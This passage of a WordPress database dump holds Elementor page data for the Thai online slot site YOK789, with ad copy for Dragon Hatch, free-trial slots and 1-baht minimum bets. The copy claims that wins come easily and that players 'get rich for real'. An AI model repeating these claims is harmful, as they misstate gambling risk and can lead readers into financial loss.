\\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2750,378,'_thumbnail_id','371'),(2751,378,'_elementor_edit_mode','builder'),(2752,378,'_elementor_template_type','wp-page'),(2753,378,'_elementor_version','3.35.5'),(2754,378,'_elementor_pro_version','3.32.3'),(2755,378,'_wp_page_template','default'),(2756,378,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2757,378,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 